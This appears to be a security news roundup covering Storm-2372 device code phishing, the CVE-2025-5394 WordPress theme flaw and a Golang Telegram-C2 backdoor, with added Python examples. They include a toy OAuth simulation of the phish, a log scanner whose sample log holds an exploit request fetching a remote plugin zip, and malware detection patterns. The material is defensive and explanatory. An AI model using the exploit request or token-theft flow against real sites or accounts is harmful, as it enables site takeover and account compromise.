The Breach News

Microsoft Warns of Russian-Linked Hackers Using ‘Device Code Phishing’ to Compromise Accounts

February 14, 2025
Enterprise Security / Cyber Attack

Microsoft has highlighted a new threat group known as Storm-2372, linked to a series of cyberattacks that have targeted multiple sectors since August 2024. The attacks focus on government entities, NGOs, IT services, defense, telecommunications, healthcare, higher education, and the energy sector across Europe, North America, Africa, and the Middle East.

Evaluated with medium confidence to align with Russian interests, the threat actors approach targets over messaging platforms such as WhatsApp, Signal, and Microsoft Teams, impersonating figures the target would recognize to build trust. The lure relies on ‘device code phishing’: the attacker initiates a legitimate OAuth device code sign-in for a productivity application and persuades the victim to enter the resulting code on the genuine login page. Because the tokens are issued to whoever started the flow, the attacker receives the victim’s access and refresh tokens and can use them without ever handling a password.
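Why the tokens land with the attacker, as an added illustration that is not Microsoft’s or the threat actor’s code: a toy authorization server implementing the OAuth 2.0 device authorization grant (RFC 8628) in Python. The endpoint comments, verification URL, client id, scopes and the victim’s address are assumptions made for the example.

```python
"""Toy model of the OAuth 2.0 device authorization grant (RFC 8628).

Added illustration; not Microsoft's or Storm-2372's code. The verification
URL, client id, scopes and victim address are made up. The point: tokens
are issued to whoever holds the device_code (the party that started the
flow), not to the browser in which the user typed the user_code.
"""
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

# RFC 8628 suggests user codes drawn from a small, non-confusable alphabet.
USER_CODE_ALPHABET = "BCDFGHJKLMNPQRSTVWXZ"


@dataclass
class PendingGrant:
    client_id: str
    scope: str
    user_code: str
    expires_at: float
    approved_by: Optional[str] = None  # username once the user consents


class AuthServer:
    """Authorization-server side of the device flow (in-memory, single process)."""

    def __init__(self, now: Callable[[], float] = time.time, lifetime: int = 900):
        self._now = now              # injectable clock so expiry can be exercised
        self._lifetime = lifetime    # device_code lifetime in seconds
        self._by_device_code: Dict[str, PendingGrant] = {}
        self._by_user_code: Dict[str, PendingGrant] = {}

    def device_authorization(self, client_id: str, scope: str) -> dict:
        """Device authorization endpoint: the 'device' (here the attacker) starts the flow."""
        device_code = secrets.token_urlsafe(32)
        raw = "".join(secrets.choice(USER_CODE_ALPHABET) for _ in range(8))
        user_code = f"{raw[:4]}-{raw[4:]}"
        grant = PendingGrant(client_id, scope, user_code, self._now() + self._lifetime)
        self._by_device_code[device_code] = grant
        self._by_user_code[user_code] = grant
        return {
            "device_code": device_code,
            "user_code": user_code,
            "verification_uri": "https://login.example/device",  # assumed URL
            "expires_in": self._lifetime,
            "interval": 5,
        }

    def user_verifies(self, user_code: str, username: str) -> str:
        """The user opens verification_uri in their own browser, signs in as
        themselves and types the user_code. Nothing ties the approval to the
        browser that performed it."""
        grant = self._by_user_code.get(user_code)
        if grant is None or self._now() > grant.expires_at:
            return "invalid_or_expired"
        grant.approved_by = username
        return "approved"

    def token(self, device_code: str) -> dict:
        """Token endpoint, grant_type=device_code: polled by the flow initiator."""
        grant = self._by_device_code.get(device_code)
        if grant is None:
            return {"error": "invalid_grant"}
        if self._now() > grant.expires_at:
            return {"error": "expired_token"}
        if grant.approved_by is None:
            return {"error": "authorization_pending"}
        # Single use: drop both codes once tokens are issued.
        del self._by_device_code[device_code]
        del self._by_user_code[grant.user_code]
        return {
            "token_type": "Bearer",
            "scope": grant.scope,
            "access_token": secrets.token_urlsafe(24),
            "refresh_token": secrets.token_urlsafe(24),
            "subject": grant.approved_by,  # whose account the tokens act for
        }


def run_device_code_phish(server: AuthServer, victim: str = "alice@example.org"):
    """Attacker initiates the flow, victim approves it; returns both poll results."""
    start = server.device_authorization("productivity-app", "Mail.Read Files.Read offline_access")
    first_poll = server.token(start["device_code"])   # nothing approved yet
    # The attacker sends start["user_code"] to the victim over Teams/Signal/
    # WhatsApp, dressed up as a meeting invite; the victim enters it on the
    # genuine login page and authenticates as themselves.
    server.user_verifies(start["user_code"], victim)
    second_poll = server.token(start["device_code"])  # victim's tokens, attacker's hands
    return first_poll, second_poll


if __name__ == "__main__":
    pending, tokens = run_device_code_phish(AuthServer())
    print(pending)
    print({k: tokens[k] for k in ("subject", "scope", "token_type")})
```

The first poll returns `authorization_pending`; the second, after the victim types the code, returns tokens whose subject is the victim, including a refresh token because `offline_access` was requested. The short code lifetime is the only time pressure on the attacker, which is why the lures push the victim to act immediately. Microsoft’s guidance for this campaign is to block the device code flow with a Conditional Access policy wherever it is not needed and to revoke refresh tokens for any user who entered a code they did not request.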

Microsoft Uncovers Russian Hackers Aiming at Foreign Embassies

New Malware: ApolloShadow Targets Vulnerable Networks. Researchers have identified a new malware strain dubbed ApolloShadow that abuses captive portal mechanisms to gain unauthorized access to systems. The malware primarily targets Windows devices, hijacking their network connectivity routines to run its payload.…

Vietnam Launches NDAChain; Tea App Data Breach Exposes User Information

Vietnam unveils NDAChain; Tea app hack leaks user data. Vietnam is progressing towards a digital economic transformation with the announcement of a national blockchain platform intended to serve several key sectors. The initiative aims to use blockchain technology to bolster data protection, identity verification,…

Hackers Target Critical Vulnerability in ‘Alone’ WordPress Theme to Take Over Websites Through Remote Plugin Installation

Jul 31, 2025
Vulnerability / Website Security

Threat actors are actively exploiting a critical security flaw in the “Alone – Charity Multipurpose Non-profit WordPress Theme” to take over vulnerable websites. The vulnerability, tracked as CVE-2025-5394, carries a CVSS score of 9.8 and was discovered and reported by security researcher Thái An. According to Wordfence, it is an arbitrary file upload flaw affecting all theme versions up to and including 7.8.3; it was patched in version 7.8.5, released on June 16, 2025. The root cause is the function “alone_import_pack_install_plugin(),” which is reachable over AJAX but performs no capability check, so an unauthenticated visitor can have the site fetch and install an arbitrary plugin from a remote source, which amounts to remote code execution. “This vulnerability allows an attacker without authentication to upload arbitrary files to a vulnerable site, leading to remote code execution…”
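Two offline checks a site owner would want for this flaw, as an added example that is not Wordfence’s or the theme vendor’s code: whether an installed copy of the theme falls in the affected range, and whether web logs show the exploitation pattern the advisory describes. The version boundaries come from the text above. The request shape is an assumption: it assumes the AJAX `action` name mirrors the function name `alone_import_pack_install_plugin` and that the remote plugin source arrives as an http(s) URL to a `.zip` in some request parameter. The log records are constructed JSON lines in a WAF/reverse-proxy style, not a real format.

```python
"""Offline checks for CVE-2025-5394 in the 'Alone' WordPress theme.

Added example, not Wordfence's or the theme vendor's code. Version
boundaries (affected <= 7.8.3, fix shipped in 7.8.5) are from the advisory
text. ASSUMPTIONS: the AJAX action name equals the function name, and the
remote plugin source is passed as an http(s) URL to a .zip file. The log
records below are constructed for the example.
"""
import json
import re
from typing import List, Tuple
from urllib.parse import parse_qs

LAST_AFFECTED = (7, 8, 3)
FIXED_IN = (7, 8, 5)


def parse_version(text: str) -> Tuple[int, ...]:
    """'7.8.3' -> (7, 8, 3); missing components pad with 0."""
    parts = [int(p) for p in re.findall(r"\d+", text)]
    return tuple((parts + [0, 0, 0])[:3])


def theme_version(style_css: str) -> str:
    """Read the Version: header that WordPress itself reads from the theme's style.css."""
    m = re.search(r"^\s*Version:\s*([0-9][\w.\-]*)", style_css, re.MULTILINE)
    if not m:
        raise ValueError("no Version header in style.css")
    return m.group(1)


def patch_status(version: str) -> str:
    """'vulnerable', 'unconfirmed' (between 7.8.3 and the named fix) or 'patched'."""
    v = parse_version(version)
    if v <= LAST_AFFECTED:
        return "vulnerable"
    if v < FIXED_IN:
        return "unconfirmed"   # the advisory names 7.8.5 as the fix, nothing in between
    return "patched"


AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION_NAME = "alone_import_pack_install_plugin"   # ASSUMPTION: action == function name
REMOTE_ZIP = re.compile(r"^https?://\S+\.zip$", re.IGNORECASE)


def triage(record: dict) -> List[str]:
    """Return the reasons one request record looks like exploitation (empty if clean)."""
    if not record.get("uri", "").endswith(AJAX_PATH):
        return []
    params = parse_qs(record.get("query", ""))       # admin-ajax reads $_REQUEST,
    params.update(parse_qs(record.get("body", "")))  # so both GET and POST matter
    action = params.get("action", [""])[0]
    if action != ACTION_NAME:
        return []
    reasons = [f"admin-ajax action {action}"]
    if not record.get("authenticated", False):
        reasons.append("unauthenticated request")   # the nopriv path is the bug
    for key, values in params.items():
        for value in values:
            if REMOTE_ZIP.match(value):
                reasons.append(f"remote plugin source in '{key}': {value}")
    return reasons


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Run triage over JSON-lines records; returns (source ip, reasons) per hit."""
    hits = []
    for line in lines:
        rec = json.loads(line)
        reasons = triage(rec)
        if reasons:
            hits.append((rec["src_ip"], reasons))
    return hits


# Constructed sample records (not real traffic).
SAMPLE_LOG = [
    json.dumps({"src_ip": "198.51.100.23", "method": "POST", "uri": "/wp-admin/admin-ajax.php",
                "query": "", "authenticated": False,
                "body": "action=alone_import_pack_install_plugin&plugin=http://203.0.113.7/wp-rce.zip"}),
    json.dumps({"src_ip": "192.0.2.10", "method": "POST", "uri": "/wp-admin/admin-ajax.php",
                "query": "", "authenticated": True, "body": "action=heartbeat&interval=60"}),
    json.dumps({"src_ip": "192.0.2.44", "method": "GET", "uri": "/wp-content/themes/alone/style.css",
                "query": "", "authenticated": False, "body": ""}),
]

if __name__ == "__main__":
    print(patch_status(theme_version("/*\nTheme Name: Alone\nVersion: 7.8.3\n*/")))
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, reasons)
```

A hit from the scan means the site should be treated as compromised regardless of its current theme version: the payload is a plugin that stays installed after the theme is updated, so the plugin list and recently modified files under `wp-content/plugins` need review. The proper fix on the theme side is a `current_user_can('install_plugins')` check plus a nonce before anything is fetched, which is exactly the capability check the advisory says was missing.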

New Golang-Based Backdoor Leverages Telegram Bot API for Stealthy C2 Operations

February 17, 2025
Threat Intelligence / Cyber Attack

Cybersecurity experts have revealed a new backdoor written in Golang that employs Telegram for command-and-control (C2) communications. Netskope Threat Labs, which analyzed the malware, suspects it may have origins in Russia. Security researcher Leandro Fróes commented, “The malware is compiled in Golang and functions as a backdoor. While it appears to be in active development, it is fully operational.” Upon execution, the backdoor verifies its location and specific file name—“C:\Windows\Temp\svchost.exe”—and if conditions aren’t met, it duplicates itself into the intended directory, launches the copied version, and then terminates its own process. A significant feature of this malware is its use of an open-source library that provides Golang bindings for the Telegram Bot API for C2 operations. This implementation includes…
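The execution pattern above gives a defender two concrete handles: a process named `svchost.exe` running from `C:\Windows\Temp` rather than `C:\Windows\System32`, and a non-browser process talking to the Telegram Bot API host. The following is an added triage example, not Netskope’s detection content, written over Sysmon-style process-create and network-connect events that are constructed inline; the field names follow Sysmon’s (`Image`, `ParentImage`, `DestinationHostname`), and the allow-list of processes permitted to reach `api.telegram.org` is an assumption to be tuned per environment.

```python
"""Host-side triage for the svchost.exe-in-Temp + Telegram C2 pattern.

Added example, not Netskope's detection content. Facts relied on: the real
svchost.exe lives under C:\\Windows\\System32 (or SysWOW64) and is started
by services.exe; the Telegram Bot API is served from api.telegram.org.
ASSUMPTION: the allow-list of images permitted to reach the API host.
Events below are constructed Sysmon-style records, not real telemetry.
"""
import ntpath
from collections import defaultdict
from typing import Dict, List

LEGIT_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
LEGIT_SVCHOST_PARENT = r"c:\windows\system32\services.exe"
WRITABLE_SYSTEM_DIR = r"c:\windows\temp"          # where this backdoor installs itself
TELEGRAM_API = "api.telegram.org"
TELEGRAM_OK_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}  # assumed


def _norm(path: str) -> str:
    return path.replace("/", "\\").strip().lower()


def check_process_create(ev: dict) -> List[str]:
    """Sysmon event 1: image path and parent of a newly created process."""
    findings = []
    image = _norm(ev["Image"])
    directory, name = ntpath.split(image)
    parent = _norm(ev.get("ParentImage", ""))
    if name == "svchost.exe":
        if directory not in LEGIT_SVCHOST_DIRS:
            findings.append(f"svchost.exe masquerade outside System32: {ev['Image']}")
        if parent != LEGIT_SVCHOST_PARENT:
            findings.append(f"svchost.exe not started by services.exe (parent: {ev.get('ParentImage')})")
    if directory == WRITABLE_SYSTEM_DIR:
        findings.append(f"executable launched from C:\\Windows\\Temp: {ev['Image']}")
    return findings


def check_network_connect(ev: dict) -> List[str]:
    """Sysmon event 3: which process opened a connection to which host."""
    host = ev.get("DestinationHostname", "").lower()
    if host != TELEGRAM_API:
        return []
    image = _norm(ev["Image"])
    if ntpath.basename(image) in TELEGRAM_OK_IMAGES:
        return []
    return [f"non-allow-listed process contacting {TELEGRAM_API}: {ev['Image']}"]


def scan(events: List[dict]) -> Dict[int, List[str]]:
    """Group findings by ProcessId so the create and connect signals land together."""
    findings: Dict[int, List[str]] = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 1:
            hits = check_process_create(ev)
        elif ev["EventID"] == 3:
            hits = check_network_connect(ev)
        else:
            hits = []
        if hits:
            findings[ev["ProcessId"]].extend(hits)
    return dict(findings)


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 912, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 1, "ProcessId": 4412, "Image": r"C:\Users\bob\Downloads\invoice.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # the dropper relaunches its copy from the expected path, then exits
    {"EventID": 1, "ProcessId": 4420, "Image": r"C:\Windows\Temp\svchost.exe",
     "ParentImage": r"C:\Users\bob\Downloads\invoice.exe"},
    {"EventID": 3, "ProcessId": 4420, "Image": r"C:\Windows\Temp\svchost.exe",
     "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
    {"EventID": 3, "ProcessId": 5100, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, *reasons, sep="\n  ")
```

The path and parent checks alone are enough to surface this sample, because a genuine `svchost.exe` is only ever started by `services.exe` from `System32`; the Telegram check is the one worth keeping after the file name changes, since Bot API traffic is ordinary HTTPS to a well-known host and is easy to miss in proxy logs.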

The Kremlin’s Cunning Hacking Group Leverages Russian ISPs to Deploy Spyware

The Russian hacker group Turla, known for their advanced cyberespionage techniques, has been linked to a new spying method that demonstrates their sophisticated approach to cyber operations. This group has made headlines for utilizing unorthodox methods, such as embedding malware communications in satellite connections or commandeering other hackers’ operations to…

HHS Data Strategy Seeks to ‘Revitalize Health Technology’

July 31, 2025
Data Privacy / Data Security / Healthcare

Voluntary Initiative Advocates for Standards and Patient Empowerment: A Privacy Perspective. By Marianne Kolbasuk McGee (HealthInfoSec).

President Donald Trump, alongside leaders from the Department of Health and Human Services (HHS), announces a new strategy aimed at enhancing health data interoperability and access.…

SafePay Raises Alarm Over Ingram Micro Breach, Imposes Ransom Deadline – Dark Reading

SafePay Claims Ingram Micro Breach, Sets Ransom Deadline. The SafePay ransomware group has publicly claimed responsibility for a breach of Ingram Micro, the global technology distributor, and has set a ransom deadline, escalating the pressure on the company.…
